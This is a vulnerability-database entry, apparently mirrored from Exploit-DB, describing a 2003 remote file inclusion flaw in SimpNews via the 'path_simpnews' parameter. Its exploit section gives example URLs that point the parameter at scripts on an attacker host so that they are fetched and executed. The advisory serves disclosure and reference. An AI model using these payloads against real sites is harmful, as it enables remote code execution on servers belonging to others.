SimpNews 2.0.1/2.13 – ‘path_simpnews’ Remote File Inclusion

SimpNews 2.0.1/2.13 – ‘path_simpnews’ Remote File Inclusion

漏洞ID 1054040 漏洞类型
发布时间 2003-07-18 更新时间 2003-07-18
图片[1]-SimpNews 2.0.1/2.13 – ‘path_simpnews’ Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-SimpNews 2.0.1/2.13 – ‘path_simpnews’ Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22927
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8227/info

SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a Simpnews URI variable. This variable is used in the include path for several SimpNews configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.

http://www.example.com/eventcal2.php.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
http://www.attacker.com/includes/has_entries.inc
or 
http://www.example.com/eventscroller.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php

相关推荐: IRIX netprint Vulnerability

IRIX netprint Vulnerability 漏洞ID 1105117 漏洞类型 Design Error 发布时间 1997-01-04 更新时间 1997-01-04 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVSS评分 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享